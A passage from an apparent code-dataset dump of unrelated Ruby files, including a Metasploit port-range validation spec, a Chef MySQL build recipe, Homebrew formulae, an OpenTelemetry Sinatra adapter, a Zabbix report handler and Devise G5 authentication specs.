minimum: MetasploitDataModels::Search::Operation::Port::Number::MINIMUM
)
}
let(:formatted_value) {
"0-#{range_end}"
}
let(:range_end) {
MetasploitDataModels::Search::Operation::Port::Number::MAXIMUM + 1
}
it { is_expected.to include error }
end
end
context 'without Integers' do
let(:begin_error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_not_an_integer',
extreme: :begin,
extreme_value: range_begin
)
}
let(:end_error) {
I18n.translate!(
'metasploit.model.errors.models.metasploit_data_models/search/operation/port/range.attributes.value.port_range_extreme_not_an_integer',
extreme: :end,
extreme_value: range_end
)
}
let(:formatted_value) {
"#{range_begin}-#{range_end}"
}
let(:range_begin) {
'a'
}
let(:range_end) {
'b'
}
it { is_expected.to include begin_error }
it { is_expected.to include end_error }
end
end
context 'without Range' do
let(:error) {
I18n.translate!('metasploit.model.errors.models.metasploit_data_models/search/operation/range.attributes.value.range')
}
let(:formatted_value) {
'1'
}
it { is_expected.to include(error) }
end
end
end
end | 31.065217 | 153 | 0.560765 |
6a5d003e87f048190f15202478b7bcb2ec9f7161 | 2,936 | # encoding: UTF-8
require 'spec_helper'
describe Banzai::Filter::TableOfContentsFilter, lib: true do
include FilterSpecHelper
def header(level, text)
"<h#{level}>#{text}</h#{level}>\n"
end
it 'does nothing when :no_header_anchors is truthy' do
exp = act = header(1, 'Header')
expect(filter(act, no_header_anchors: 1).to_html).to eq exp
end
it 'does nothing with empty headers' do
exp = act = header(1, nil)
expect(filter(act).to_html).to eq exp
end
1.upto(6) do |i|
it "processes h#{i} elements" do
html = header(i, "Header #{i}")
doc = filter(html)
expect(doc.css("h#{i} a").first.attr('id')).to eq "header-#{i}"
end
end
describe 'anchor tag' do
it 'has an `anchor` class' do
doc = filter(header(1, 'Header'))
expect(doc.css('h1 a').first.attr('class')).to eq 'anchor'
end
it 'links to the id' do
doc = filter(header(1, 'Header'))
expect(doc.css('h1 a').first.attr('href')).to eq '#header'
end
describe 'generated IDs' do
it 'translates spaces to dashes' do
doc = filter(header(1, 'This header has spaces in it'))
expect(doc.css('h1 a').first.attr('id')).to eq 'this-header-has-spaces-in-it'
end
it 'squeezes multiple spaces and dashes' do
doc = filter(header(1, 'This---header is poorly-formatted'))
expect(doc.css('h1 a').first.attr('id')).to eq 'this-header-is-poorly-formatted'
end
it 'removes punctuation' do
doc = filter(header(1, "This, header! is, filled. with @ punctuation?"))
expect(doc.css('h1 a').first.attr('id')).to eq 'this-header-is-filled-with-punctuation'
end
it 'appends a unique number to duplicates' do
doc = filter(header(1, 'One') + header(2, 'One'))
expect(doc.css('h1 a').first.attr('id')).to eq 'one'
expect(doc.css('h2 a').first.attr('id')).to eq 'one-1'
end
it 'supports Unicode' do
doc = filter(header(1, '한글'))
expect(doc.css('h1 a').first.attr('id')).to eq '한글'
expect(doc.css('h1 a').first.attr('href')).to eq '#한글'
end
end
end
describe 'result' do
def result(html)
HTML::Pipeline.new([described_class]).call(html)
end
let(:results) { result(header(1, 'Header 1') + header(2, 'Header 2')) }
let(:doc) { Nokogiri::XML::DocumentFragment.parse(results[:toc]) }
it 'is contained within a `ul` element' do
expect(doc.children.first.name).to eq 'ul'
expect(doc.children.first.attr('class')).to eq 'section-nav'
end
it 'contains an `li` element for each header' do
expect(doc.css('li').length).to eq 2
links = doc.css('li a')
expect(links.first.attr('href')).to eq '#header-1'
expect(links.first.text).to eq 'Header 1'
expect(links.last.attr('href')).to eq '#header-2'
expect(links.last.text).to eq 'Header 2'
end
end
end
| 29.959184 | 95 | 0.604564 |
abaf1bd60b452cb704432fa93ac947d537d86637 | 1,791 | require "otp/utils"
require "otp/base32"
require "otp/uri"
module OTP
class Base
include OTP::Utils
DEFAULT_DIGITS = 6
DEFAULT_ALGORITHM = "SHA1"
attr_accessor :secret, :algorithm, :digits
attr_accessor :issuer, :accountname
def initialize(secret=nil, algorithm=nil, digits=nil)
self.secret = secret
self.algorithm = algorithm || DEFAULT_ALGORITHM
self.digits = digits || DEFAULT_DIGITS
end
def new_secret(num_bytes=10)
self.raw_secret = OpenSSL::Random.random_bytes(num_bytes)
end
def raw_secret=(bytes)
self.secret = OTP::Base32.encode(bytes)
end
def raw_secret
return OTP::Base32.decode(secret)
end
def moving_factor
raise NotImplementedError
end
def password(generation=0)
return otp(algorithm, raw_secret, moving_factor+generation, digits)
end
def verify(given_pw, last:0, post:0)
raise ArgumentError, "last must be greater than or equal to 0" if last < 0
raise ArgumentError, "post must be greater than or equal to 0" if post < 0
return false if given_pw.nil? || given_pw.empty?
return (-last..post).any?{|i| otp_compare(password(i), given_pw) }
end
def to_uri
return OTP::URI.format(self)
end
def uri_params
params = {}
params[:secret] = secret
params[:issuer] = issuer if issuer
params[:algorithm] = algorithm if algorithm != DEFAULT_ALGORITHM
params[:digits] = digits if digits != DEFAULT_DIGITS
return params
end
def extract_uri_params(params)
self.secret = params["secret"]
self.issuer = issuer || params["issuer"]
self.algorithm = params["algorithm"] || algorithm
self.digits = (params["digits"] || digits).to_i
end
end
end
| 25.956522 | 80 | 0.6622 |
33d15cd89f786bcdefa46833ddfcdec92f60b98a | 1,946 | Chef::Log.info("mysql-memcached : source install dependencies")
package 'cmake' do
  action :upgrade
end
package 'bison' do
  action :upgrade
end
package 'libncurses5-dev' do
  action :upgrade
end
include_recipe "ri_mysql_memcached_plugin::client"
Chef::Log.info("mysql-memcached : download source")
remote_file "#{node[:mysql][:build_dir]}/mysql-#{node[:mysql][:version]}.tar.gz" do
source "#{node[:rawiron][:backends_url]}/mysql-#{node[:mysql][:version]}.tar.gz"
end
execute "tar xzvf mysql-#{node[:mysql][:version]}.tar.gz" do
cwd "#{node[:mysql][:build_dir]}"
end
Chef::Log.info("mysql-memcached : create user mysql")
group node[:mysql][:group] do
system true
end
user node[:mysql][:user] do
gid node[:mysql][:group]
shell "/bin/bash"
home node[:mysql][:datadir]
system true
end
Chef::Log.info("mysql-memcached : create /var directories")
directory node[:mysql][:datadir] do
owner node[:mysql][:user]
group node[:mysql][:group]
mode 0750
not_if { ::File.exists?(node[:mysql][:datadir]) }
end
directory node[:mysql][:logdir] do
owner node[:mysql][:user]
mode 0755
action :create
not_if { ::File.exists?(node[:mysql][:logdir]) }
end
directory node[:mysql][:rundir] do
owner node[:mysql][:user]
group node[:mysql][:group]
mode 0755
not_if { ::File.exists?(node[:mysql][:rundir]) }
end
Chef::Log.info("mysql-memcached : make install")
execute "make install" do
cwd "#{node[:mysql][:build_dir]}/mysql-#{node[:mysql][:version]}"
command <<-EOH
cmake . -DWITH_INNODB_MEMCACHED=ON
make
make install
EOH
end
Chef::Log.info("mysql-memcached : install db")
execute "install system catalog" do
cwd "#{node[:mysql][:source_basedir]}"
command <<-EOH
./scripts/mysql_install_db --datadir=#{node[:mysql][:datadir]} --user=#{node[:mysql][:user]} --no-defaults
chown -R root .
chown -R #{node[:mysql][:user]} data
EOH
end | 23.731707 | 110 | 0.65519 |
e98b70a6189c1abb74681c65ac4c5adf16aaae61 | 128 | require 'email_spec'
RSpec.configure do |config|
config.include(EmailSpec::Helpers)
config.include(EmailSpec::Matchers)
end
| 21.333333 | 37 | 0.789063 |
d5c509a75df6f89016cf0e15b43dedfc79b9af42 | 1,349 | # frozen_string_literal: true
# Copyright 2019 OpenTelemetry Authors
#
# SPDX-License-Identifier: Apache-2.0
require 'sinatra'
require 'opentelemetry'
require_relative 'extensions/tracer_extension'
module OpenTelemetry
module Adapters
module Sinatra
class Adapter
class << self
attr_reader :config,
:propagator
def install(config = {})
return :already_installed if installed?
@config = config
@propagator = OpenTelemetry.tracer_factory.http_text_format
new.install
end
def tracer
@tracer ||= OpenTelemetry.tracer_factory.tracer(
Sinatra.name,
Sinatra.version
)
end
attr_accessor :installed
alias_method :installed?, :installed
end
# @return [Symbol] indicating whether the method has already
# been called or not (arbitrary, useful for testing purposes)
def install
return :already_installed if self.class.installed?
self.class.installed = true
register_tracer_extension
:installed
end
private
def register_tracer_extension
::Sinatra::Base.register Extensions::TracerExtension
end
end
end
end
end
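# Minimal usage sketch (the require path is an assumption; a real application
# would normally install adapters through the OpenTelemetry SDK configuration
# rather than calling this class directly):
#
#   require 'opentelemetry/adapters/sinatra'
#
#   OpenTelemetry::Adapters::Sinatra::Adapter.install   # => :installed
#   OpenTelemetry::Adapters::Sinatra::Adapter.install   # => :already_installed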
| 22.483333 | 71 | 0.606375 |
b96896b129a188aa9d764c6b3c2e897b0d431a7a | 476 | # Write first_pos, a method which takes a string and , returns a hash
# whose keys are all the words in the string, and values are the
# earliest position they were seen in the string.
#
# There will be no punctuation in the strings.
#
# first_pos "The dog and the cat and the cow" # => {"The" => 0, "dog" => 1, "and" => 2, "the" => 3, "cat" => 4, "cow" => 7}
def first_pos(string)
words = {}
string.split(" ").each_with_index { |word, i| words[word] ||= i }
words
end
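# Quick demonstration of the method above (output shown inline):
p first_pos("The dog and the cat and the cow")
# => {"The"=>0, "dog"=>1, "and"=>2, "the"=>3, "cat"=>4, "cow"=>7}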
| 34 | 123 | 0.642857 |
e2d24bdfd9fc63d67c1a64111a6cb816726bebb0 | 2,532 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# Note that this schema.rb definition is the authoritative source for your
# database schema. If you need to create the application database on another
# system, you should be using db:schema:load, not running all the migrations
# from scratch. The latter is a flawed and unsustainable approach (the more migrations
# you'll amass, the slower it'll run and the greater likelihood for issues).
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2017_10_25_101231) do
create_table "admins", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "cars", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "cities", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "drinks", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "foods", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "marks", force: :cascade do |t|
t.string "marker_type"
t.integer "marker_id"
t.string "markable_type"
t.integer "markable_id"
t.string "mark", limit: 128
t.datetime "created_at"
t.index ["markable_id", "markable_type", "mark"], name: "index_marks_on_markable_id_and_markable_type_and_mark"
t.index ["markable_type", "markable_id"], name: "index_marks_on_markable_type_and_markable_id"
t.index ["marker_id", "marker_type", "mark"], name: "index_marks_on_marker_id_and_marker_type_and_mark"
t.index ["marker_type", "marker_id"], name: "index_marks_on_marker_type_and_marker_id"
end
create_table "superlative_people", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
create_table "users", force: :cascade do |t|
t.string "name"
t.datetime "created_at", null: false
t.datetime "updated_at", null: false
end
end
| 35.661972 | 115 | 0.720379 |
6a7a5c5d424079549d248a42ac33e371697ed9ae | 3,014 | class ArxLibertatis < Formula
desc "Cross-platform, open source port of Arx Fatalis"
homepage "https://arx-libertatis.org/"
license "GPL-3.0"
revision 2
stable do
url "https://arx-libertatis.org/files/arx-libertatis-1.1.2.tar.xz"
sha256 "82adb440a9c86673e74b84abd480cae968e1296d625b6d40c69ca35b35ed4e42"
# Add a missing include to CMakeLists.txt
patch do
url "https://github.com/arx/ArxLibertatis/commit/442ba4af978160abd3856a9daec38f5b6e213cb4.patch?full_index=1"
sha256 "de361866cc51c14f317a67dcfd3b736160a577238f931c78a525ea2864b1add9"
end
end
livecheck do
url :head
regex(/^v?(\d+(?:\.\d+)+)$/i)
end
bottle do
cellar :any
sha256 "2a9e06b2b91e1133389728b2ad0c81f23d95a266a451144fb8639953b5a96cd3" => :big_sur
sha256 "b93ffc0870dffd0bab99117814e3c094fc019c2315bdd8fc35f687c1009dd661" => :catalina
sha256 "39fc49249e5a82bd067c05bcd056b454a90ace91f364b3c33534901827247b2c" => :mojave
sha256 "2fe2043845655c6f3e75be1dc7213826fd142f806fd7b59006fdef940584e92a" => :high_sierra
end
head do
url "https://github.com/arx/ArxLibertatis.git"
resource "arx-libertatis-data" do
url "https://github.com/arx/ArxLibertatisData.git"
end
end
depends_on "boost" => :build
depends_on "cmake" => :build
depends_on "glm" => :build
depends_on "freetype"
depends_on "glew"
depends_on "innoextract"
depends_on "sdl"
conflicts_with "rnv", because: "both install `arx` binaries"
def install
args = std_cmake_args
# The patches for these aren't straightforward to backport because of
# other changes; these minimal inreplaces get it building.
# HEAD is fine, and the next stable release will contain these changes.
if build.stable?
# https://github.com/arx/ArxLibertatis/commit/39fb9a0e3a6888a6a5f040e39896e88750c89065
inreplace "src/platform/Time.cpp", "clock_t ", "clockid_t "
# Version parsing is broken in the current stable; fixed upstream.
# This hardcodes the current version based on data from VERSION.
inreplace "src/core/Version.cpp.in" do |s|
s.gsub! "${VERSION_COUNT}", "5"
s.gsub! "${VERSION_2}", "10"
s.gsub! "${VERSION_0}", "1.1.2"
s.gsub! "${GIT_SUFFIX_5}", "+Homebrew-1"
s.gsub! "${VERSION_4}", "Rhaa Movis"
end
end
# Install prebuilt icons to avoid inkscape and imagemagick deps
if build.head?
(buildpath/"arx-libertatis-data").install resource("arx-libertatis-data")
args << "-DDATA_FILES=#{buildpath}/arx-libertatis-data"
end
mkdir "build" do
system "cmake", "..", *args
system "make", "install"
end
end
def caveats
<<~EOS
This package only contains the Arx Libertatis binary, not the game data.
To play Arx Fatalis you will need to obtain the game from GOG.com and
install the game data with:
arx-install-data /path/to/setup_arx_fatalis.exe
EOS
end
test do
system "#{bin}/arx", "-h"
end
end
| 31.395833 | 115 | 0.697744 |
3831e65ecad3c14039e443a90c88eec875545581 | 1,856 | require 'yaml'
require 'active_support/concern'
module Geokit
# Contains a class method geocode_ip_address which can be used to enable automatic geocoding
# for request IP addresses. The geocoded information is stored in a cookie and in the
# session to minimize web service calls. The point of the helper is to enable location-based
# websites to have a best-guess for new visitors.
module IpGeocodeLookup
extend ActiveSupport::Concern
# Class method to mix into active record.
module ClassMethods # :nodoc:
def geocode_ip_address(filter_options = {})
if respond_to? :before_action
before_action :store_ip_location, filter_options
else
before_filter :store_ip_location, filter_options
end
end
end
private
# Places the IP address' geocode location into the session if it
# can be found. Otherwise, looks for a geo location cookie and
# uses that value. The last resort is to call the web service to
# get the value.
def store_ip_location
session[:geo_location] ||= retrieve_location_from_cookie_or_service
cookies[:geo_location] = { :value => session[:geo_location].to_yaml, :expires => 30.days.from_now } if session[:geo_location]
end
# Uses the stored location value from the cookie if it exists. If
# no cookie exists, calls out to the web service to get the location.
def retrieve_location_from_cookie_or_service
return GeoLoc.new(YAML.load(cookies[:geo_location])) if cookies[:geo_location]
location = Geocoders::MultiGeocoder.geocode(get_ip_address)
return location.success ? location : nil
end
# Returns the real ip address, though this could be the localhost ip
# address. No special handling here anymore.
def get_ip_address
request.remote_ip
end
end
end
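# Hypothetical controller wiring for the mixin above (class name and filter
# options are illustrative only):
#
#   class WelcomeController < ApplicationController
#     include Geokit::IpGeocodeLookup
#     geocode_ip_address :only => [:index]
#
#     def index
#       # a Geokit::GeoLoc, or nil if the lookup failed
#       @visitor_location = session[:geo_location]
#     end
#   end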
| 37.877551 | 131 | 0.721444 |
33721dbe3c9bd8f8746ea209905967f4ade727c1 | 950 | require "language/haskell"
class Hledger < Formula
include Language::Haskell::Cabal
desc "Command-line accounting tool"
homepage "http://hledger.org"
url "https://hackage.haskell.org/package/hledger-1.10/hledger-1.10.tar.gz"
sha256 "f64420f852502e84dfa9374ace1d00a06ecf1641ad9fd3b22d7c2c48c1d5c4d3"
bottle do
cellar :any_skip_relocation
# sha256 "7d195e01de4bfa26d518d8b85f4df54e591863325db9095dba2061d09982b598" => :mojave
sha256 "4ae8f7b5ff4619b067064183e3939da3cbb62f4cd317803a24ef29d3ae955815" => :high_sierra
sha256 "1ac46662414ced9e4e8949060c5060a8c9e55a9894dc362f59198ce388893184" => :sierra
sha256 "d36fc1aa14f0a5f14dbf4a3bed694a5a9a1d507735ebc6955470c1eae64ff4a4" => :el_capitan
end
depends_on "cabal-install" => :build
depends_on "ghc" => :build
def install
install_cabal_package :using => ["happy"]
end
test do
touch ".hledger.journal"
system "#{bin}/hledger", "test"
end
end
| 30.645161 | 93 | 0.773684 |
61f89daf8d0344ea4a24e773847350451c864571 | 1,825 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "gapic/common"
require "gapic/config"
require "gapic/config/method"
require "google/cloud/ai_platform/v1/version"
require "google/cloud/ai_platform/v1/pipeline_service/credentials"
require "google/cloud/ai_platform/v1/pipeline_service/paths"
require "google/cloud/ai_platform/v1/pipeline_service/operations"
require "google/cloud/ai_platform/v1/pipeline_service/client"
module Google
module Cloud
module AIPlatform
module V1
##
# A service for creating and managing Vertex AI's pipelines. This includes both
# `TrainingPipeline` resources (used for AutoML and custom training) and
# `PipelineJob` resources (used for Vertex Pipelines).
#
# To load this service and instantiate a client:
#
# require "google/cloud/ai_platform/v1/pipeline_service"
# client = ::Google::Cloud::AIPlatform::V1::PipelineService::Client.new
#
module PipelineService
end
end
end
end
end
helper_path = ::File.join __dir__, "pipeline_service", "helpers.rb"
require "google/cloud/ai_platform/v1/pipeline_service/helpers" if ::File.file? helper_path
| 34.433962 | 90 | 0.731507 |
084f976e1b06e477e28add3df6ef88bb661e6fa5 | 1,392 | require 'rubygems'
require 'chef/log'
require 'chef'
require 'tempfile'
module Zabbix
class Report < Chef::Handler
def report
Chef::Log.info "Zabbix::Report handler started"
prefix = "custom.chef-client.last_run"
file = Tempfile.new('client-handler-zabbix-report')
host_name = node[:zabbix][:agent][:hostname] || node[:fqdn]
message = [
"#{host_name} #{prefix}.success #{run_status.success? ? 1 : 0}",
"#{host_name} #{prefix}.elapsed_time #{run_status.elapsed_time}",
"#{host_name} #{prefix}.start_time #{run_status.start_time.to_i}",
"#{host_name} #{prefix}.end_time #{run_status.end_time.to_i}",
"#{host_name} #{prefix}.all_resources_num #{run_status.all_resources.length}",
"#{host_name} #{prefix}.updated_resources_num #{run_status.updated_resources.length}",
].join("\n")
file.write(message)
file.close()
cmd = [File.join(node['zabbix']['bin_dir'], "zabbix_sender"), "--config", File.join(node['zabbix']['etc_dir'], "zabbix_agentd.conf"), "--input-file", file.path]
Chef::Log.debug "Sending to zabbix: #{message}"
Chef::Log.debug "Command #{cmd.join(" ")}"
if RUBY_VERSION < "1.9"
out = IO.popen(cmd.join(" "))
else
out = IO.popen(cmd)
end
Chef::Log.debug "output #{out.readlines}"
out.close
end
end
end
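# The handler is registered outside this file; a typical client.rb entry
# (paths are illustrative) looks like:
#
#   require '/var/chef/handlers/zabbix_report'
#   report_handlers << Zabbix::Report.new
#   exception_handlers << Zabbix::Report.new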
| 34.8 | 166 | 0.619253 |
ed1317d1760d0146c667d1ea484b0aee7b279a6f | 992 | {
matrix_id: '1211',
name: 't3dl_e',
group: 'Oberwolfach',
description: 'Oberwolfach: micropyros thruster, E matrix',
author: 'E. Rudnyi',
editor: 'E. Rudnyi',
date: '2004',
kind: 'duplicate model reduction problem',
problem_2D_or_3D: '1',
num_rows: '20360',
num_cols: '20360',
nonzeros: '20360',
num_explicit_zeros: '0',
num_strongly_connected_components: '20360',
num_dmperm_blocks: '20360',
structural_full_rank: 'true',
structural_rank: '20360',
pattern_symmetry: '1.000',
numeric_symmetry: '1.000',
rb_type: 'real',
structure: 'symmetric',
cholesky_candidate: 'yes',
positive_definite: 'yes',
norm: '2.163773e-06',
min_singular_value: '3.587500e-10',
condition_number: '6.031422e+03',
svd_rank: '20360',
sprank_minus_rank: '0',
null_space_dimension: '0',
full_numerical_rank: 'yes',
image_files: 't3dl_e.png,t3dl_e_dmperm.png,t3dl_e_svd.png,t3dl_e_graph.gif,',
}
| 29.176471 | 81 | 0.654234 |
5db3569b47521aee7b2ff4697d398661db839389 | 141 | require 'rails_helper'
RSpec.describe CourseClassesTrainer, :type => :model do
pending "add some examples to (or delete) #{__FILE__}"
end
| 23.5 | 56 | 0.751773 |
bf3166d1c01f8d5ef7407503bf16eeb89c1811f1 | 21,425 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe Devise::Models::G5Authenticatable do
subject { model }
let(:model_class) { User }
let(:model) { model_class.new(attributes) }
let(:attributes) { {} }
describe '#save!' do
subject(:save) { model.save! }
context 'when model is new' do
let(:attributes) do
{ email: email,
password: password,
password_confirmation: password_confirmation,
provider: provider,
uid: uid,
current_password: current_password,
updated_by: updated_by }
end
let(:email) { '[email protected]' }
let(:password) { 'my_secret' }
let(:password_confirmation) { password }
let(:current_password) { 'my_current_password' }
let(:provider) {}
let(:uid) {}
let(:updated_by) { model_class.new }
let(:auth_user_creator) { double(:auth_user_creator, create: auth_user) }
let(:auth_user) { double(:auth_user, id: auth_id) }
let(:auth_id) { 1 }
before do
allow(Devise::G5::AuthUserCreator).to receive(:new)
.and_return(auth_user_creator)
end
context 'when model is valid' do
before { save }
it 'should persist the email' do
expect(model_class.find(model.id).email).to eq(email)
end
it 'should not persist the password' do
expect(model_class.find(model.id).password).to be_nil
end
it 'should not persist the password_confirmation' do
expect(model_class.find(model.id).password_confirmation).to be_nil
end
it 'should not persist the current_password' do
expect(model_class.find(model.id).current_password).to be_nil
end
it 'should not persist updated by' do
expect(model_class.find(model.id).updated_by).to be_nil
end
it 'should initialize a service class for creating auth users' do
expect(Devise::G5::AuthUserCreator).to have_received(:new).with(model)
end
it 'should create an auth user' do
expect(auth_user_creator).to have_received(:create)
end
end
context 'when uid is an integer' do
let(:uid) { 42 }
it 'should not raise an error' do
expect { save }.to_not raise_error
end
end
context 'when there is an error creating the auth user' do
before do
allow(auth_user_creator).to receive(:create).and_raise(error)
end
context 'with OAuth2::Error' do
let(:error) { OAuth2::Error.new(response) }
let(:response) do
double(:response, :parsed => error_hash,
:body => error_body,
:error= => nil)
end
let(:error_hash) do
{ 'error' => error_code,
'error_description' => error_description }
end
let(:error_code) { "Email can't be blank" }
let(:error_description) { 'Validation failed' }
let(:error_body) { 'problems' }
it 'should raise a RecordNotSaved error with the OAuth error code' do
expect { save }.to raise_error(ActiveRecord::RecordNotSaved,
error_code)
end
end
context 'with some other error' do
let(:error) { StandardError.new(error_message) }
let(:error_message) { 'problems' }
it 'should raise a RecordNotSaved error' do
expect { save }.to raise_error(ActiveRecord::RecordNotSaved,
error_message)
end
end
end
end
context 'when model is updated' do
let(:model) { create(:user) }
let(:auth_user_updater) { double(:user_updater, update: auth_user) }
let(:auth_user) { double(:auth_user, id: auth_id) }
let(:auth_id) { 'remote-auth-id-42' }
before do
allow(Devise::G5::AuthUserUpdater).to receive(:new)
.and_return(auth_user_updater)
end
context 'with successful auth user update' do
before { save }
it 'should initialize the auth user updater' do
expect(Devise::G5::AuthUserUpdater).to have_received(:new).with(model)
end
it 'should update the auth user' do
expect(auth_user_updater).to have_received(:update)
end
end
context 'with unsuccessful auth user update' do
before do
allow(auth_user_updater).to receive(:update).and_raise(error_message)
end
let(:error_message) { 'problems' }
it 'should raise an error' do
expect { save }.to raise_error(error_message)
end
end
end
end
describe '#update_with_password' do
subject { update_with_password }
let(:update_with_password) { model.update_with_password(params) }
let(:model) { create(:user) }
let(:params) do
{ current_password: current_password,
password: updated_password,
password_confirmation: updated_password,
email: updated_email }
end
let(:current_password) {}
let(:updated_password) { 'updated_secret' }
let(:updated_email) { '[email protected]' }
let(:auth_updater) { double(:auth_user_updater, update: true) }
before do
allow(Devise::G5::AuthUserUpdater).to receive(:new)
.and_return(auth_updater)
end
let(:password_validator) { double(:auth_password_validator) }
before do
allow(Devise::G5::AuthPasswordValidator)
.to receive(:new)
.and_return(password_validator)
end
context 'with valid current password' do
before do
allow(password_validator).to receive(:valid_password?).and_return(true)
end
before { update_with_password }
context 'with valid input' do
it 'should return true' do
expect(update_with_password).to be_truthy
end
it 'should initialize the auth user updater' do
expect(Devise::G5::AuthUserUpdater).to have_received(:new).with(model)
end
it 'should update the credentials in the auth server' do
expect(auth_updater).to have_received(:update)
end
it 'should update the email on the local model' do
expect(model.email).to eq(updated_email)
end
end
context 'when there is a validation error' do
let(:updated_email) { '' }
it 'should return false' do
expect(update_with_password).to be_falsey
end
it 'should not update the credentials on the auth server' do
expect(auth_updater).to_not have_received(:update)
end
it 'should add an error to the email attribute' do
expect(model.errors[:email].count).to eq(1)
end
end
end
context 'with invalid current password' do
before do
allow(password_validator).to receive(:valid_password?).and_return(false)
end
before { update_with_password }
context 'when current password is missing' do
let(:current_password) { '' }
it 'should return false' do
expect(update_with_password).to be_falsey
end
it 'should set an error on the current_password attribute' do
expect(model.errors[:current_password]).to include("can't be blank")
end
it 'should not update user credentials in the remote server' do
expect(auth_updater).to_not have_received(:update)
end
end
context 'when current password is incorrect' do
let(:current_password) { 'something wrong' }
it 'should return false' do
expect(update_with_password).to be_falsey
end
it 'should set an error on the current_password attribute' do
expect(model.errors[:current_password]).to include('is invalid')
end
it 'should not update user credentials in the remote server' do
expect(auth_updater).to_not have_received(:update)
end
end
end
end
describe '#clean_up_passwords' do
subject(:clean_up_passwords) { model.clean_up_passwords }
let(:model) do
build_stubbed(:user, password: password,
password_confirmation: password)
end
let(:password) { 'foobarbaz' }
it 'should change the password to nil' do
expect { clean_up_passwords }
.to change { model.password }
.from(password).to(nil)
end
it 'should change the password_confirmation to nil' do
expect { clean_up_passwords }
.to change { model.password_confirmation }
.from(password).to(nil)
end
end
describe '#valid_password?' do
subject(:valid_password?) { model.valid_password?(password) }
let(:model) { create(:user) }
let(:password) { 'foobarbaz' }
let(:password_validator) do
double(:password_validator, valid_password?: valid)
end
before do
allow(Devise::G5::AuthPasswordValidator).to receive(:new)
.and_return(password_validator)
end
before { valid_password? }
context 'when password is valid' do
let(:valid) { true }
it 'should return true' do
expect(valid_password?).to be_truthy
end
it 'should initialize the validator with the model' do
expect(Devise::G5::AuthPasswordValidator).to have_received(:new)
.with(model)
end
it 'should check the password against the auth server' do
expect(password_validator).to have_received(:valid_password?)
.with(password)
end
end
context 'when password is invalid' do
let(:valid) { false }
it 'should return false' do
expect(valid_password?).to be_falsey
end
it 'should initialize the validator with the model' do
expect(Devise::G5::AuthPasswordValidator).to have_received(:new)
.with(model)
end
it 'should check the password against the auth server' do
expect(password_validator).to have_received(:valid_password?)
.with(password)
end
end
end
describe '.find_and_update_for_g5_oauth' do
subject(:find_and_update) do
model_class.find_and_update_for_g5_oauth(auth_data)
end
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
context 'when model exists' do
let!(:model) do
create(:user, provider: auth_data['provider'],
uid: auth_data['uid'],
g5_access_token: 'old_token')
end
it 'should return the model' do
expect(find_and_update).to eq(model)
end
it 'should save the updated g5_access_token' do
find_and_update
model.reload
expect(model.g5_access_token).to eq(auth_data.credentials.token)
end
it 'should save the updated email' do
find_and_update
model.reload
expect(model.email).to eq(auth_data.info.email)
end
it 'executes the callback to update role data' do
expect_any_instance_of(model_class).to receive(:update_roles_from_auth)
.with(auth_data)
find_and_update
end
end
context 'when model does not exist' do
it 'should return nothing' do
expect(find_and_update).to be_nil
end
it 'does not execute the callback to update role data' do
expect_any_instance_of(model_class)
.to_not receive(:update_roles_from_auth)
find_and_update
end
end
end
describe '.find_for_g5_oauth' do
subject(:find_for_g5_oauth) { model_class.find_for_g5_oauth(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: uid,
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
context 'when model exists' do
let!(:model) do
create(:user, email: '[email protected]',
provider: auth_data.provider,
uid: uid.to_s)
end
context 'when auth data uid is an integer' do
let(:uid) { 42 }
it 'should return the model' do
expect(find_for_g5_oauth).to eq(model)
end
it 'should not create any new models' do
expect { find_for_g5_oauth }.to_not change { model_class.count }
end
end
context 'when auth data uid is a string' do
let(:uid) { 'some/crazy/string1234#id' }
it 'should return the model' do
expect(find_for_g5_oauth).to eq(model)
end
it 'should not create any new models' do
expect { find_for_g5_oauth }.to_not change { model_class.count }
end
end
end
context 'given a model with invalid arguments' do
let(:uid) { 42 }
context 'having an un-existing uid' do
let!(:model) do
create(:user, email: '[email protected]',
provider: auth_data.provider,
uid: 0)
end
it 'finds the record by email address' do
expect(find_for_g5_oauth).to eq(model)
end
end
context 'having an un-existing uid' do
let!(:model) do
create(:user, email: '[email protected]',
provider: auth_data.provider,
uid: 0)
end
it 'finds the record by email address' do
expect(find_for_g5_oauth).to eq(model)
end
end
end
context 'when model does not exist' do
let(:uid) { '42' }
it 'should not return anything' do
expect(find_for_g5_oauth).to be_nil
end
it 'should not create any new models' do
expect { find_for_g5_oauth }.to_not change { model_class.count }
end
end
end
describe '#update_g5_credentials' do
subject(:update_g5_credentials) { model.update_g5_credentials(auth_data) }
let(:auth_data) do
OmniAuth::AuthHash.new(provider: 'g5',
uid: '123999',
info: { name: 'Foo Bar',
email: '[email protected]' },
credentials: { token: 'abc123' })
end
let(:model) do
create(:user, provider: auth_data['provider'],
uid: auth_data['uid'],
g5_access_token: 'old_token')
end
it 'should update the g5_access_token' do
expect { update_g5_credentials }.to change { model.g5_access_token }
.to(auth_data.credentials.token)
